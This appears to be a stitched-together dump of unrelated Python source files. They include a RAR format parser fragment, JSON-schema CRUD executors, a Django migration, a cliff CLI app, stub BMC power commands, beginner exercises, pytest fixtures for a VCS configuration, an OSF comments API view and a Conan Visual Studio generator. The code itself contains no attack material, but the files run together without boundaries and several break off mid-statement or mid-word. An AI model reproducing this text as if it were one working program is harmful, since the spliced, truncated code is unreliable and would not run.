_method", "Comment packing method") yield UInt16(s, "comment_crc16", "Comment CRC") def commentBody(s): size = s["total_size"].value - s.current_size if size > 0: yield RawBytes(s, "comment_data", size, "Compressed comment data") def signatureHeader(s): yield TimeDateMSDOS32(s, "creation_time") yield filesizeHandler(UInt16(s, "arc_name_size")) yield filesizeHandler(UInt16(s, "user_name_size")) def recoveryHeader(s): yield filesizeHandler(UInt32(s, "total_size")) yield textHandler(UInt8(s, "version"), hexadecimal) yield UInt16(s, "rec_sectors") yield UInt32(s, "total_blocks") yield RawBytes(s, "mark", 8) def avInfoHeader(s): yield filesizeHandler(UInt16(s, "total_size", "Total block size")) yield UInt8(s, "version", "Version needed to decompress", handler=hexadecimal) yield UInt8(s, "method", "Compression method", handler=hexadecimal) yield UInt8(s, "av_version", "Version for AV", handler=hexadecimal) yield UInt32(s, "av_crc", "AV info CRC32", handler=hexadecimal) def avInfoBody(s): size = s["total_size"].value - s.current_size if size > 0: yield RawBytes(s, "av_info_data", size, "AV info") class FileFlags(FieldSet): static_size = 16 def createFields(self): yield Bit(self, "continued_from", "File continued from previous volume") yield Bit(self, "continued_in", "File continued in next volume") yield Bit(self, "is_encrypted", "File encrypted with password") yield Bit(self, "has_comment", "File comment present") yield Bit(self, "is_solid", "Information from previous files is used (solid flag)") # The 3 following lines are what blocks more staticity yield Enum(Bits(self, "dictionary_size", 3, "Dictionary size"), DICTIONARY_SIZE) yield Bit(self, "is_large", "file64 operations needed") yield Bit(self, "is_unicode", "Filename also encoded using Unicode") yield Bit(s
elf, "has_salt", "Has salt for encryption") yield Bit(self, "uses_file_version", "File versio
ning is used") yield Bit(self, "has_ext_time", "Extra time info present") yield Bit(self, "has_ext_flags", "Extra flag ??") for field in commonFlags: yield field[0](self, *field[1:]) def fileFlags(s): yield FileFlags(s, "flags", "File block flags") class ExtTimeFlags(FieldSet): static_size = 16 def createFields(self): for name in ['arctime', 'atime', 'ctime', 'mtime']: yield Bits(self, "%s_count" % name, 2, "Number of %s bytes" % name) yield Bit(self, "%s_onesec" % name, "Add one second to the timestamp?") yield Bit(self, "%s_present" % name, "Is %s extra time present?" % name) class ExtTime(FieldSet): def createFields(self): yield ExtTimeFlags(self, "time_flags") for name in ['mtime', 'ctime', 'atime', 'arctime']: if self['time_flags/%s_present' % name].value: if name != 'mtime': yield TimeDateMSDOS32(self, "%s" % name, "%s DOS timestamp" % name) count = self['time_flags/%s_count' % name].value if count: yield Bits(self, "%s_remainder" % name, 8 * count, "%s extra precision time (in 100ns increments)" % name) def createDescription(self): out = 'Time extension' pieces = [] for name in ['mtime', 'ctime', 'atime', 'arctime']: if not self['time_flags/%s_present' % name].value: continue if name == 'mtime': basetime = self['../ftime'].value else: basetime = self['%s' % name].value delta = timedelta() if self['time_flags/%s_onesec' % name].value: delta += timedelta(seconds=1) if '%s_remainder'%name in self: delta += timedelta(microseconds=self['%s_remainder' % name].value / 10.0) pieces.append('%s=%s' % (name, basetime + delta)) if pieces: out += ': ' + ', '.join(pieces) return out def specialHeader(s, is_file): yield filesizeHandler(UInt32(s, "compressed_size", "Compressed size (bytes)")) yield filesizeHandler(UInt32(s, "uncompressed_size", "Uncompressed size (bytes)")) yield Enum(UInt8(s, "host_os", "Operating system used for archiving"), OS_NAME) yield textHandler(UInt32(s, "crc32", "File CRC32"), hexadecimal) yield TimeDateMSDOS32(s, "ftime", "Date and time (MS DOS format)") yield textHandler(UInt8(s, "version", "RAR version needed to extract file"), formatRARVersion) yield Enum(UInt8(s, "method", "Packing method"), COMPRESSION_NAME) yield filesizeHandler(UInt16(s, "filename_length", "File name size")) if s["host_os"].value in (OS_MSDOS, OS_WIN32): yield MSDOSFileAttr32(s, "file_attr", "File attributes") else: yield textHandler(UInt32(s, "file_attr", "File attributes"), hexadecimal) # Start additional field from unrar if s["flags/is_large"].value: yield filesizeHandler(UInt64(s, "large_size", "Extended 64bits filesize")) # End additional field size = s["filename_length"].value if size > 0: if s["flags/is_unicode"].value: charset = "UTF-8" else: charset = "ISO-8859-15" yield String(s, "filename", size, "Filename", charset=charset) # Start additional fields from unrar - file only if is_file: if s["flags/has_salt"].value: yield RawBytes(s, "salt", 8, "Encryption salt to increase security") if s["flags/has_ext_time"].value: yield ExtTime(s, "extra_time") def fileHeader(s): return specialHeader(s, True) def fileBody(s): # File compressed data size = s["compressed_size"].value if s["flags/is_large"].value: size += s["large_size"].value if size > 0: yield RawBytes(s, "compressed_data", size, "File compressed data") def fileDescription(tag): def _fileDescription(s): return "%s: %s (%s)" % \ (tag, s["filename"].display, s["compressed_size"].display) return _fileDescription def newSubHeader(s): return specialHeader(s, False) class EndFlags(StaticFieldSet): format = ( (Bit, "has_next_vol", "Whether 
there is another next volume"), (Bit, "has_data_crc", "Whether a CRC value is present"), (Bit, "rev_space"), (Bit, "has_vol_number", "Whether the volume number is present"), (NullBits, "unused[]", 10), ) + commonFlags def endFlags(s): yield EndFlags(s, "flags", "End block flags") class BlockFlags(StaticFieldSet): static_size = 16 format = ( (NullBits, "unused[]", 14), ) + commonFlags class Block(FieldSet): BLOCK_INFO = { # None means 'use default function' 0x72: ("marker", "File format marker", markerFlags, None, None), 0x73: ("archive_start", "Archive info", archiveFlags, archiveHeader, None), 0x74: ("file[]", fileDescription("File entry"), fileFlags, fileHeader, fileBody), 0x75: ("comment[]", "Comment", None, commentHeader, commentBody), 0x76: ("av_info[]", "Extra information", None, avInfoHeader, avInfoBody), 0x77: ("sub_block[]", fileDescription("Subblock"), None, newSubHeader, fileBody), 0x78: ("recovery[]", "Recovery block", None, recoveryHeader, None), 0x79: ("signature", "Signature block", None, signatureHeader, None), 0x7A: ("sub_block[]", fileDescription("New-format subblock"), fileFlags, newSubHeader, fileBody), 0x7B: ("archive_end", "Archive end block", endFlags, None, None), } def __init__(self, parent, name): FieldSet.__init__(self, parent, name) t = self["block_type"].value if t in self.BLOCK_INFO: self._name, desc, parseFlags, parseHeader, parseBody = self.BLOCK_INFO[t] if callable(desc): self.createDescription = lambda: desc(self) elif desc: self._description = desc if parseFlags : self.parseFlags = lambda: parseFlag
# -*- coding:utf-8 -*-
import copy
from zope.interface import implementer
from .interfaces import (
    IExecutor,
    ISchemaValidation,
    IDataValidation,
    ICreate,
    IDelete,
    IEdit
)
from alchemyjsonschema.dictify import (
    normalize,
    validate_all,
    ErrorFound
)
from jsonschema import FormatChecker
from jsonschema.validators import Draft4Validator


class ValidationError(Exception):
    pass


@implementer(IExecutor)
class Executor(object):
    def __init__(self, context, params):
        self.context = context
        self.raw_params = params
        self.params = None

    def validation(self, ob=None):
        raise NotImplementedError

    def execute(self, ob=None):
        raise NotImplementedError

    def default_validation(self, iface, ob=None, name=""):
        fn = self.context.customized_or_default(iface, ISchemaValidation, name=name)
        params = fn(self.context, self.raw_params)
        fn2 = self.context.customized_or_default(iface, IDataValidation, name=name)
        fn2(self.context, params, ob)
        return params


class CreateExecutor(Executor):
    def validation(self, ob=None):
        self.params = self.default_validation(ICreate, ob)

    def execute(self, ob=None):
        if self.params is None:
            raise RuntimeError("execute after validation")
        ob = self.context.modelclass(**self.params)
        self.context.session.add(ob)
        self.context.session.flush()
        return ob


class EditExecutor(Executor):
    def validation(self, ob=None):
        self.params = self.default_validation(IEdit, ob)

    def execute(self, ob):
        if self.params is None:
            raise RuntimeError("execute after validation")
        for k, v in self.params.items():
            setattr(ob, k, v)
        self.context.session.add(ob)
        return ob


class DeleteExecutor(Executor):
    def validation(self, ob=None):
        self.params = self.default_validation(IDelete, ob)

    def execute(self, ob):
        self.context.session.delete(ob)
        return ob


def create_jsonschema_validation(context, params, ob=None):
    def customize_schema(schema):
        schema = copy.deepcopy(schema)
        # when creating a model, id is not needed.
        if "id" in schema["required"]:
            schema["required"].remove("id")
        if "id" in schema["properties"]:
            schema["properties"].pop("id")
        return schema
    schema = customize_schema(context.schema)
    schema_validator = Draft4Validator(schema, format_checker=FormatChecker())
    try:
        validate_all(params, schema_validator)
    except ErrorFound as err:
        raise ValidationError({e.path[0]: e.message for e in err.errors})
    return normalize(params, schema)


def edit_jsonschema_validation(context, params):
    schema = context.schema
    schema_validator = Draft4Validator(schema, format_checker=FormatChecker())
    try:
        validate_all(params, schema_validator)
    except ErrorFound as err:
        raise ValidationError({e.path[0]: e.message for e in err.errors})
    return normalize(params, schema)


def delete_jsonschema_validation(context, params):
    return params
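# --- Hedged usage sketch (assumptions marked below) -----------------------------
# The executors above follow a two-step protocol: validation() must run first
# (it fills self.params through the ISchemaValidation / IDataValidation adapters)
# and execute() then applies the validated params.  The sketch assumes a
# hypothetical `context` object exposing `modelclass`, `session` and
# `customized_or_default`, as the Executor classes require; it is not an API
# defined in this module.
def create_object(context, raw_params):
    executor = CreateExecutor(context, raw_params)
    executor.validation()      # may raise ValidationError
    return executor.execute()  # adds and flushes the new model instance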
# -*- coding: utf-8 -*- # Copyright © 2014-2016 Digital Catapult and The Copyright Hub Foundation # (together the Open Permissions Platform Coalition) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is dist
ributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""API Roles handler.

Allows roles to be created and modified.
"""
from koi import auth
from perch import Token, User
from tornado.gen import coroutine

from .base import BaseHandler


class RolesHandler(BaseHandler):
    """Responsible for managing role resources."""

    @auth.auth_required(Token.valid)
    @coroutine
    def get(self):
        """Get all roles."""
        roles = {x.value for x in User.roles}
        result = [{'id': x, 'name': x.title()} for x in roles]

        self.finish({
            'status': 200,
            'data': result
        })
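# --- Hedged illustration ---------------------------------------------------------
# For a hypothetical User.roles enumeration containing "user" and "administrator",
# the handler above would respond with a body shaped like:
#
#   {"status": 200,
#    "data": [{"id": "user", "name": "User"},
#             {"id": "administrator", "name": "Administrator"}]}
#
# The concrete role names are assumptions; only the shape follows from the code.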
# -*- coding: utf-8 -*- # Generated by Django 1.10.7 on 2017-07-05 10:03 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('account', '0003_auto_20170705_0958'), ] operations = [ migrations.RenameField( model_name='oauthtoken', old_name='renew_token', new_name='refresh_token', ), migrations.RenameField( model
_name='oauthtoken',
old_name='renew_token_expiration', new_name='refresh_token_expiration', ), ]
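# --- Hedged note ------------------------------------------------------------------
# The two RenameField operations above only rename columns on account.OAuthToken
# (renew_token -> refresh_token and renew_token_expiration ->
# refresh_token_expiration); applying them would be the usual
# `python manage.py migrate account` invocation.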
import logging import sys from cliff.app import App from cliff.commandmanager import CommandManager # from .utils import ColorLogFormatter from nicelog.formatters import ColorLineFormatter class HarvesterApp(App): logger = logging.getLogger(__name__) def __init__(self): super(HarvesterApp, self).__init__( description='Harvester application CLI', version='0.1', command_manager=CommandManager('harvester.commands')) def configure_logging(self): """ Create logging handlers for any log output. Modified version to set custom formatter for console """ root_logger = logging.getLogger('') root_logger.setLevel(logging.DEBUG) # Set up logging to a file if self.options.log_file: file_handler = logging.FileHandler( filename=self.options.log_file, ) formatter = logging.Formatter(self.LOG_FILE_MESSAGE_FORMAT) file_handler.setFormatter(formatter) root_logger.addHandler(file_handler) # Always send higher-level messages to the console via stderr console = logging.StreamHandler(self.stderr) console_level = {0: logging.WARNING, 1: logging.INFO, 2: logging.DEBUG, }.get(self
.options.verbose_level, logging.DEBUG) console.setLevel(console_level) # formatter = logging.Formatter(self.CONSOLE_MESSAGE_FORMAT) formatter = ColorLineFormatter( show_date=True, show_function=True, show_filename=True) console
.setFormatter(formatter) root_logger.addHandler(console) return def main(argv=sys.argv[1:]): myapp = HarvesterApp() return myapp.run(argv) if __name__ == '__main__': sys.exit(main())
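# --- Hedged sketch: how a subcommand would plug into the CLI above ----------------
# CommandManager('harvester.commands') discovers subcommands through setuptools
# entry points in that namespace.  The command below and the entry-point snippet
# are illustrative assumptions (module path, command name), not part of the app.
from cliff.command import Command


class Hello(Command):
    """Print a greeting (example command)."""

    def get_parser(self, prog_name):
        parser = super(Hello, self).get_parser(prog_name)
        parser.add_argument('name', nargs='?', default='world')
        return parser

    def take_action(self, parsed_args):
        self.app.stdout.write('hello %s\n' % parsed_args.name)

# setup.py (illustrative):
#   entry_points={
#       'harvester.commands': [
#           'hello = harvester.commands.hello:Hello',
#       ],
#   }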
# -*- coding: utf-8 -*- vim:fileencoding=utf-8: # vim: tabstop=4:shiftwidth=4:softtabstop=4:expandtab # Copyright © 2010-2012 Greek Research and Technology Network (GRNET S.A.) # # Permission to use, copy, modify, and/or dis
tribute this software for any # purpose
with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH REGARD # TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND # FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, # OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF # USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER # TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE # OF THIS SOFTWARE. ''' Module containing dummy implementations of django management commands Idea is to be able to use it for unit tests and as a reference ''' def power_on(hostname, username, password, **kwargs): ''' Power on command ''' return True def power_off(hostname, username, password, **kwargs): ''' Power off command ''' return True def power_off_acpi(hostname, username, password, **kwargs): ''' Power off using ACPI command ''' return True def power_cycle(hostname, username, password, **kwargs): ''' Cold boot command ''' return True def power_reset(hostname, username, password, **kwargs): ''' Warm boot command ''' return True def pass_change(hostname, username, password, **kwargs): ''' Change BMC password ''' return True def set_settings(hostname, username, password, **kwargs): ''' Set BMC settings ''' return True def set_ldap_settings(hostname, username, password, **kwargs): ''' Set BMC LDAP settings ''' return True def boot_order(hostname, username, password, **kwargs): ''' Set boot order ''' return True def license_set(hostname, username, password, **kwargs): ''' Set BMC License ''' return True def bmc_reset(hostname, username, password, **kwargs): ''' Reset BMC ''' return True def bmc_factory_defaults(hostname, username, password, **kwargs): ''' Reset BMC to factory defaults ''' return True def add_user(hostname, username, password, **kwargs): ''' Add a user to the BMC ''' return True def remove_user(hostname, username, password, **kwargs): ''' Remove a User from the BMC ''' return True def get_all_users(hostname, username, password, **kwargs): ''' Get a list of all configured users on the BMC ''' return True def firmware_update(hostname, username, password, **kwargs): ''' Performs a firmware update of the BMC ''' return True
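# --- Hedged usage sketch -----------------------------------------------------------
# The module docstring above says these dummies exist for unit tests and as a
# reference: every command accepts (hostname, username, password, **kwargs) and
# simply reports success.  A test could therefore exercise them roughly like the
# sketch below; the test names are assumptions and the sketch assumes it sits next
# to (or imports the names from) the module above.
import unittest


class DummyCommandsTest(unittest.TestCase):
    def test_every_command_reports_success(self):
        for command in (power_on, power_off, power_cycle, bmc_reset):
            self.assertTrue(command('bmc.example.org', 'admin', 'secret'))


if __name__ == '__main__':
    unittest.main()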
hiddenimports = ['decimal']
#Problem 1:
#Python provides a built-in function called len that returns the length of a string
#so the value of len('allen') is 5.
#Write a function named right_justify that takes a string named s as a parameter and prints
#the string with enough leading spaces so that the last letter of the string is in column 70
#of the display.

#word = raw_input('Type a word to send over there ---->\n')

def right_justify(word):
    print " " * (70 - len(word)) + word

#right_justify(word)

#Problem 2:
#1. Type this example into a script and test it:
#def do_twice(f):
#    f()
#    f()
#2. Modify do_twice so that it takes two arguments, a function object and a value,
#and calls the function twice, passing the value as an argument.
#3. Write a more general version of print_spam, called print_twice, that takes a
#string as a parameter and prints it twice.
#4. Use the modified version of do_twice to call print_twice twice, passing 'spam'
#as an argument.
#5. Define a new function called do_four that takes a function object and a value
#and calls the function four times, passing the value as a parameter. There should
#be only two statements in the body of this function, not four.

word = raw_input('Type a word to repeat\n')
string = raw_input('Type something here\n')

def do_twice(f, word):
    # Call the function object twice, passing the value along each time.
    f(word)
    f(word)

def print_spam(word):
    print word

def print_twice(string):
    print string
    print string

def do_four(f, word):
    # Only two statements: each do_twice call invokes f twice.
    do_twice(f, word)
    do_twice(f, word)

do_four(print_twice, 'spam')
print ''
impor
t pytest from
punch import vcs_configuration as vc @pytest.fixture def global_variables(): return { 'serializer': '{{ major }}.{{ minor }}.{{ patch }}', 'mark': 'just a mark' } @pytest.fixture def vcs_config_dict(): return { 'name': 'git', 'commit_message': "Version updated to {{ new_version }}", 'finish_release': True, 'options': { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': '', } } @pytest.fixture def vcs_config_dict_with_include_files(vcs_config_dict): vcs_config_dict['include_files'] = ['HISTORY.rst'] return vcs_config_dict @pytest.fixture def vcs_config_dict_with_include_all_files(vcs_config_dict): vcs_config_dict['include_all_files'] = True return vcs_config_dict @pytest.fixture def special_variables(): return { 'current_version': '1.2.3', 'new_version': '1.3.0' } def test_vcs_configuration_from_string( vcs_config_dict, global_variables, special_variables): vcsconf = vc.VCSConfiguration(vcs_config_dict['name'], vcs_config_dict['options'], global_variables, special_variables, vcs_config_dict['commit_message'] ) expected_options = { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': '', 'current_version': '1.2.3', 'new_version': '1.3.0' } assert vcsconf.name == 'git' assert vcsconf.commit_message == "Version updated to 1.3.0" assert vcsconf.include_files == [] assert vcsconf.finish_release is True assert vcsconf.options == expected_options def test_vcs_configuration_from_string_with_include_files( vcs_config_dict_with_include_files, global_variables, special_variables): vcsconf = vc.VCSConfiguration( vcs_config_dict_with_include_files['name'], vcs_config_dict_with_include_files['options'], global_variables, special_variables, vcs_config_dict_with_include_files['commit_message'], include_files=vcs_config_dict_with_include_files['include_files'] ) assert vcsconf.include_files == ['HISTORY.rst'] def test_vcs_configuration_from_string_with_include_all_files( vcs_config_dict_with_include_all_files, global_variables, special_variables): vcsconf = vc.VCSConfiguration( vcs_config_dict_with_include_all_files['name'], vcs_config_dict_with_include_all_files['options'], global_variables, special_variables, vcs_config_dict_with_include_all_files['commit_message'], include_all_files=vcs_config_dict_with_include_all_files[ 'include_all_files'] ) assert vcsconf.include_all_files is True def test_vcs_configuration_from_dict( vcs_config_dict, global_variables, special_variables): vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) expected_options = { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': '', 'current_version': '1.2.3', 'new_version': '1.3.0' } assert vcsconf.name == 'git' assert vcsconf.commit_message == "Version updated to 1.3.0" assert vcsconf.include_files == [] assert vcsconf.finish_release is True assert vcsconf.options == expected_options def test_vcs_configuration_from_dict_with_include_files( vcs_config_dict_with_include_files, global_variables, special_variables): vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict_with_include_files, global_variables, special_variables ) assert vcsconf.include_files == ['HISTORY.rst'] def test_vcs_configuration_from_dict_with_include_all_files( vcs_config_dict_with_include_all_files, global_variables, special_variables): vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict_with_include_all_files, global_variables, special_variables ) assert vcsconf.include_all_files is True def 
test_vcs_configuration_from_dict_without_commit_message( vcs_config_dict, global_variables, special_variables): vcs_config_dict.pop('commit_message') vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) expected_options = { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': '', 'current_version': '1.2.3', 'new_version': '1.3.0' } assert vcsconf.name == 'git' assert vcsconf.commit_message == "Version updated 1.2.3 -> 1.3.0" assert vcsconf.include_files == [] assert vcsconf.finish_release is True assert vcsconf.options == expected_options def test_vcs_configuration_from_dict_without_finish_release( vcs_config_dict, global_variables, special_variables): vcs_config_dict.pop('finish_release') vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) expected_options = { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': '', 'current_version': '1.2.3', 'new_version': '1.3.0' } assert vcsconf.name == 'git' assert vcsconf.commit_message == "Version updated to 1.3.0" assert vcsconf.include_files == [] assert vcsconf.finish_release is True assert vcsconf.options == expected_options def test_vcs_configuration_from_dict_without_options( vcs_config_dict, global_variables, special_variables): vcs_config_dict.pop('options') vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) assert vcsconf.name == 'git' assert vcsconf.commit_message == "Version updated to 1.3.0" assert vcsconf.finish_release is True def test_vcs_configuration_from_dict_can_use_global_variables( vcs_config_dict, global_variables, special_variables): vcs_config_dict['commit_message'] = "Mark: {{ mark }}" vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) assert vcsconf.commit_message == "Mark: just a mark" def test_vcs_configuration_from_dict_special_variables_take_precedence( vcs_config_dict, global_variables, special_variables): vcs_config_dict['commit_message'] = "{{ current_version }}" global_variables['current_version'] = "5.0.0" vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) assert vcsconf.commit_message == "1.2.3" def test_vcs_configuration_from_dict_options_templates_are_processed( vcs_config_dict, global_variables, special_variables): vcs_config_dict['options']['annotation_message'] = \ "Updated {{ current_version}} -> {{ new_version }}" vcsconf = vc.VCSConfiguration.from_dict( vcs_config_dict, global_variables, special_variables ) expected_options = { 'make_release_branch': False, 'annotate_tags': False, 'annotation_message': 'Updated 1.2.3 -> 1.3.0', 'current_version': '1.2.3', 'new_version': '1.3.0' } assert vcsconf.options == expected_options
from django.conf.urls.defaults import patterns # noqa fr
om django.conf.urls.defaults import url # noqa from openstack_dashboard.dashboards.fogbow.usage import views from openstack_dashboard.dashboards.fogbow.u
sage.views import IndexView urlpatterns = patterns('', url(r'^$', IndexView.as_view(), name='index'), url(r'^(?P<member_id>.*)/usage$', views.getSpecificMemberUsage, name='usage'), )
amework.exceptions import NotFound, ValidationError, PermissionDenied from modularodm import Q from modularodm.exceptions import NoResultsFound from api.base.exceptions import Gone from api.base import permissions as base_permissions from api.base.views import JSONAPIBaseView from api.comments.permissions import ( CommentDetailPermissions, CommentReportsPermissions ) from api.comments.serializers import ( CommentSerializer, CommentDetailSerializer, CommentReportSerializer, CommentReportDetailSerializer, CommentReport ) from framework.auth.core import Auth from framework.auth.oauth_scopes import CoreScopes from framework.exceptions import PermissionsError from website.project.model import Comment class CommentMixin(object): """Mixin with convenience methods for retrieving the current comment based on the current URL. By default, fetches the comment based on the comment_id kwarg. """ serializer_class = CommentSerializer comment_lookup_url_kwarg = 'comment_id' def get_comment(self, check_permissions=True): pk = self.kwargs[self.comment_lookup_url_kwarg] try: comment = Comment.find_one(Q('_id', 'eq', pk) & Q('root_target', 'ne', None)) except NoResultsFound: raise NotFound # Deleted root targets still appear as tuples in the database and are included in # the above query, requiring an additional check if comment.root_target.referent.is_deleted: comment.root_target = None comment.save() if comment.root_target is None: raise NotFound if check_permissions: # May raise a permission denied self.check_object_permissions(self.request, comment) return comment class CommentDetail(JSONAPIBaseView, generics.RetrieveUpdateDestroyAPIView, CommentMixin): """Details about a specific comment. *Writeable*. ###Permissions Comments on public nodes are given read-only access to everyone. Comments on private nodes are only visible to contributors and administrators on the parent node. Only the user who created the comment has permission to edit and delete the comment. Note that if an anonymous view_only key is being used, the user relationship will not be exposed. ##Attributes OSF comment entities have the "comments" `type`. name type description ================================================================================= content string content of the comment date_created iso8601 timestamp timestamp that the comment was created date_modified iso8601 timestamp timestamp when the comment was last updated modified boolean has this comment been edited? deleted boolean is this comment deleted? is_abuse boolean has this comment been reported by the current user? has_children boolean does this comment have replies? can_edit boolean can the current user edit this comment? ##Relationships ###User The user who created the comment. ###Node The project associated with this comment. ###Target The "parent" of the comment. If the comment was made on a node, the target is the node. If the comment is a reply, its target is the comment it was in reply to. ###Replies List of replies to this comment. New replies can be created through this endpoint. ###Reports List of spam reports for this comment. Only users with permission to create comments can access this endpoint, and users can only see reports that they have created. 
##Links self: the canonical api endpoint of this comment ##Actions ###Update Method: PUT / PATCH URL: /links/self Query Params: <none> Body (JSON): { "data": { "type": "comments", # required "id": {comment_id}, # required "attributes": { "content": {content}, # mandatory "deleted": {is_deleted}, # mandatory } } } Success: 200 OK + comment representation To update a comment, issue either a PUT or a PATCH request against the `/links/self` URL. The `content` and `deleted` fields are mandatory if you PUT and optional if you PATCH. Non-string values will be accept
ed and stringified, but we make no promises about the stringification output. So don't do that. To restore a deleted comment, issue a PATCH request against the `/links/self` URL, with `deleted: False`. ###Delete Method: DELETE URL: /link
s/self Query Params: <none> Success: 204 No Content To delete a comment send a DELETE request to the `/links/self` URL. Nothing will be returned in the response body. Attempting to delete an already deleted comment will result in a 400 Bad Request response. ##Query Params *None*. #This Request/Response """ permission_classes = ( drf_permissions.IsAuthenticatedOrReadOnly, CommentDetailPermissions, base_permissions.TokenHasScope, ) required_read_scopes = [CoreScopes.NODE_COMMENTS_READ] required_write_scopes = [CoreScopes.NODE_COMMENTS_WRITE] serializer_class = CommentDetailSerializer view_category = 'comments' view_name = 'comment-detail' # overrides RetrieveAPIView def get_object(self): return self.get_comment() def perform_destroy(self, instance): auth = Auth(self.request.user) if instance.is_deleted: raise ValidationError('Comment already deleted.') else: try: instance.delete(auth, save=True) except PermissionsError: raise PermissionDenied('Not authorized to delete this comment.') class CommentReportsList(JSONAPIBaseView, generics.ListCreateAPIView, CommentMixin): """List of reports made for a comment. *Writeable*. Paginated list of reports for a comment. Each resource contains the full representation of the report, meaning additional requests to an individual comment's report detail view are not necessary. ###Permissions The comment reports endpoint can only be viewed by users with permission to comment on the node. Users are only shown comment reports that they have made. ##Attributes OSF comment report entities have the "comment_reports" `type`. name type description ===================================================================================== category string the type of spam, must be one of the allowed values message string description of why the comment was reported ##Links See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination). ##Actions ###Create Method: POST URL: /links/self Query Params: <none> Body (JSON): { "data": { "type": "comment_reports", # required "attributes": { "category": {category}, # mandatory "message": {text}, # optional } } } Success: 201 CREATED + comment report representation To create a report for this comment, issue a POST request against this endpoint. The `category` field is mandatory, and must be one of the following: "spam", "hate" or "violence" . The `message` field is optional. If the comment report creation is successful the API will return a 201 response with the repres
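# The docstrings above spell out the JSON:API payloads for updating and deleting
# comments. The snippet below is a hedged client-side sketch of the documented
# PATCH action using the `requests` library; the API root, comment id and token
# are hypothetical placeholders, not values taken from this codebase.
import requests

API_BASE = 'https://api.example.org/v2'   # hypothetical API root
COMMENT_ID = 'abc12'                      # hypothetical comment id

payload = {
    'data': {
        'type': 'comments',
        'id': COMMENT_ID,
        'attributes': {'content': 'Updated comment text'},
    }
}
response = requests.patch(
    '{}/comments/{}/'.format(API_BASE, COMMENT_ID),
    json=payload,
    headers={'Authorization': 'Bearer <access-token>'},
)
response.raise_for_status()  # a 200 OK carries the updated comment representation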
from vsg.vhdlFile.extract import tokens def get_n_token_after_tokens(iToken, lTokens, lAllTokens, oTokenMap): lReturn = [] lIndexes = [] for oToken in lTokens: lTemp = oTokenMap.get_token_indexes(oToken) for iTemp in lTemp: iTokenIndex = iTemp for iCount in range(0, iToken): iTokenIndex = oTokenMap.get_index_of_next_non_whitespace_token(iTokenIndex, bExcludeComments=True) lIndexes.append(iTokenIndex) lIndexes.sort() for iIndex in lIndexes: iLine =
oTokenMap.get_line_number_of_index(iIndex) lReturn.append(tokens.New(iIndex, iLine, [lAllTokens[iIndex]])) return lReturn
#!/usr/bin/env python3
number = 23
guess = int(input('Enter an integer : '))
if guess == number:
    # A new block starts here
    print('Congratulations, you guessed it.')
    print('(but you do not win any pizzas!)')
    # The new block ends here
elif guess < number:
    # Another block
    print('No, it is a little higher than that')
    # You can do whatever you want inside this block
else:
    print('No, it is a little lower than that')
    # You can only reach here by guessing a number greater than (>) the set number
print('Done')
# This last statement is always executed,
# after the if statement has finished.
import os import re from conans.model import Generator from conans.paths import BUILD_INFO_VISUAL_STUDIO from conans.client.tools.files import VALID_LIB_EXTENSIONS class VisualStudioGenerator(Generator): template = '''<?xml version="1.0" encoding="utf-8"?> <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <ImportGroup Label="PropertySheets" /> <PropertyGroup Label="UserMacros" /> <PropertyGroup Label="Conan-RootDirs">{item_properties} </PropertyGroup> {properties} <ItemGroup /> </Project>''' properties_template = '''<PropertyGroup Label="ConanVariables"{condition}> <ConanPackageName>{conan_package_name}</ConanPackageName> <ConanPackageVersion>{conan_package_version}</ConanPackageVersion> <ConanCompilerFlags>{compiler_flags}</ConanCompilerFlags> <ConanLinkerFlags>{linker_flags}</ConanLinkerFlags> <ConanPreprocessorDefinitions>{definitions}</ConanPreprocessorDefinitions> <ConanIncludeDirectories>{include_dirs}</ConanIncludeDirectories> <ConanResourceDirectories>{res_dirs}</ConanResourceDirectories> <ConanLibraryDirectories>{lib_dirs}</ConanLibraryDirectories> <ConanBinaryDirectories>{bin_dirs}</ConanBinaryDirectories> <ConanLibraries>{libs}</ConanLibraries> <ConanSystemDeps>{system_libs}</ConanSystemDeps> </PropertyGroup> <PropertyGroup{condition}> <LocalDebuggerEnvironment>PATH=%PATH%
;{bin_dirs}</LocalDebuggerEnvironment> <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor> </PropertyGroup> <ItemDefinitionGroup{condition}> <ClCompile> <AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <P
